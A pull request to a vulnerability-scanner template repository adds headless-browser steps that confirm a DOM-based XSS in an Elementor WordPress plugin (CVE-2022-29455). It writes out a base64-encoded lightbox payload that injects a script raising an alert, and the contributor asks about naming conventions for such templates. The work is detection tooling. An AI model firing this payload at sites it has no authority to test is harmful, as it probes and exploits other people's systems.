### PR TITLE
Adding headless logic to template to prove exploitation

### DIFF
--- a/http/cves/2022/CVE-2022-29455.yaml
+++ b/http/cves/2022/CVE-2022-29455.yaml
@@ -64,4 +64,19 @@ http:
         group: 1
         regex:
           - "(?m)Stable tag: ([0-9.]+)"
+
+headless:
+  - steps:
+      - args:
+          url: "{{BaseURL}}/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCdudWNsZWknKTwvc2NyaXB0PiJ9"
+        action: navigate
+
+      - action: waitdialog
+        name: reflected_topicId_query
+
+    matchers:
+      - type: dsl
+        dsl:
+          - reflected_topicId_query == true
+          - reflected_topicId_query_message == "nuclei"
 # digest: 4a0a00473045022100858601373725b12b684161de1ae137bd5a6616ceefe4c962f524c35c04d120630220249f912ca10d201292a084a5e754e1ff128eb1e3a875140d7bd61c93cfc06d2e:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
### Template / PR Information

Hey projectdiscovery! I wanted to add some validation logic here instead of just extracting version number. The biggest benefit I see for Nuclei is the validation of exploitation. Of course, it brings up a conflict. There's http and headless workers here but running without the -headless flag fails to execute the http worker. I realize it's a current limitation, but wondering the feasibility of adding some logic to template runs to still execute http work in a template if the -headless flag isn't provided. 

Alternatively, is there a naming convention for headless specific templates? Example, if I wanted to contribute working headless exploit code for this, or any other template, would I create a new template and name it CVE-2022-29455_headless.yaml or similar?

If I should submit as a separate template (maybe this is superfluous) let me know and I'll make the necessary changes.

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO

![http-headless-2022-29455](https://github.com/user-attachments/assets/f8825e1b-5091-4bfe-b62a-6fcf692a18f2)
